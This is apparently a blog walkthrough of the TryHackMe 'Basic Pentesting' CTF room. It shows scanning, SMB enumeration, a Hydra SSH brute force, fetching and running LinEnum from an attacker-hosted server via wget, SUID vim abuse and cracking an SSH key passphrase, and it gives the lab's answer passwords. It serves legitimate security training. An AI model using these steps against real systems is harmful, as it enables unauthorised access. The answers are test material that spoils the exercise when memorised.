Jasper Alblas
TryHackMe: Basic Pentesting – Walkthrough
Hi! It is time to look at the Basic Pentesting room on TryHackMe. In this CTF we practise web app hacking and privilege escalation.
Table of Contents
Task 1: Web App Testing and Privilege Escalation
In these set of tasks you’ll learn the following:
- brute forcing
- hash cracking
- service enumeration
- Linux Enumeration
Credits to Josiah Pierce from Vulnhub.
Questions
Deploy the machine and connect to our network
Answer: No answer needed
Find the services exposed by the machine
This time I decided to use the following command:
nmap -sC -sV -oN nmap -p- <target ip>Breakdown:
- -sC → Runs default Nmap scripts (equivalent to –script=default).
- -sV → Version detection (identifies services running on open ports).
- -oN nmap → Saves the results in normal output format to a file named nmap.
- -p- → Scans all 65,535 ports (instead of just the top 1,000).
- <target ip> → The target IP address you want to scan.
The open ports are:
We can see a SSH service, SMB, a webserver, in addition to Jserv and Tomcat.
And the script results:
Answer: No answer needed
What is the name of the hidden directory on the web server(enter name without /)?
There is a web server running on port 80:
We can take a look at the source code:
Dev section…hmm. Let’s search for hidden directories by using dirbuster or gobuster. We will use gobuster here. We can use the following command:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u <target ip>
We found a development page. Maybe this is the one referred to in the source code!
Answer: development
User brute-forcing to find the username & password
Let’s have a look at the page we found:
Interesting. We get to see the files in the directory. Let’s have a look at both:
dev.txt:
j.txt:
A bunch of info here. We learn about Apache and SMB, but more importantly the author of dev.txt mentions Apache Struts, which is a Java Web Application framework. In addition he mentions version 2.5.12 and that he used a REST version.
In the other file we get a hint about weak credentials found in the /etc/shadow file.
But we don’t have access to the system yet!
Remember back from the port scanning that we discovered SMB? Let’s enumerate that. We do this with the following command:
enum4linux <target ip>This gives us a bunch of info on the SMB service:
We can see that anonymous access is possible using ‘’ as username and ‘’ as password. A bit further below we read the following lines:
Jan and Kay. Sure sounds like the users mentioned in j.txt. So we can pretty much conclude that Jan has a weak password.
Let’s try bruteforce Jan’s account with Hydra! We can use the following command:
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://<target ip>Let it run for a bit and you will find the answer:
Armando!
Answer: No answer needed
What is the username?
Answer: jan
BONUS:
We could also have figured this out by accessing the anonymous share through smbclient:
If we read this txt file:
What is the password?
See above to find the cracked password.
Answer: armando
What service do you use to access the server(answer in abbreviation in all caps)?
We have seen a SSH service running.
Answer: SSH
Enumerate the machine to find any vectors for privilege escalation
We can now login with SSH. We can use the following command:
ssh jan@<ip>Then write the password when prompted. We get access to jan’s home directory:
If we look a bit further we can get into Kay’s home directory as well:
We can see pass.bak, which is a backup of some kind. Maybe a password?
To be able to get escalated privileges we can use a tool such as LinEnum to get more info on possible attack vectors. We need to do the following:
1. Download LinEnum from here: https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
You can copy the RAW text and enter it into a file called LinEnum.
2. Startup a simple Python web server from the directory of the new file:
python -m http.server 80003. Download the file from the target machine:
wget http://<attacker ip>:8000/LinEnum4. You need to give yourself executable privileges on the file:
chmod +x LinEnum5. Run it!
Alternatively you can use scp to copy it over!
Read through the results. I will paste a few interesting tidbits here:
We can see that Kay is an admin.
We can read the passwd file, but not the shadow file.
Now this is interesting. Vim.basic is a SUID file, meaning we can run it with root privileges. Now we can use vim to read the pass.bak file from earlier!
This is actually the answer to the final question!
We can now change user with the new password:
Answer: No answer needed
What is the name of the other user you found(all lower case)?
Answer: kay
If you have found another user, what can you do with this information?
Well, here’s the thing. I already answered the final question. But on a more thorough look we can find out something interesting in Kay’s .ssh directory. There is a private key!
We can try logging in:
ssh kay@10.10.225.25 -i /home/kay/.ssh/id_rsaUnfortunately we are missing a passphrase:
We can use john the ripper to crack this, specifically ssh2john. This is located on the following location:
Let’s run the following command after saving the rsa key on your attacker machine.
/opt/john/ssh2john.py kay_id_rsa > john_hash.txtNow we can run John:
john john_hash.txt --wordlist=/usr/share/wordlists/rockyou.txtAnd we find the passphrase:
Now we can login:
And enter the passphrase beeswax.
This was another way in!
Answer: No answer needed
What is the final password you obtain?
We found this earlier through the vulnerability in the vim executable.
Answer: heresareallystrongpasswordthatfollowsthepasswordpolicy
Conclusion (Basic Pentesting Room)
Thanks for reading. Hopefully you found out that there are many ways to get root access 🙂
You can find my other walkthroughs here.
Like my articles?
You are welcome to comment on this article and share my post with friends. I would be so grateful if you support me by buying me a cup of coffee:
I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:
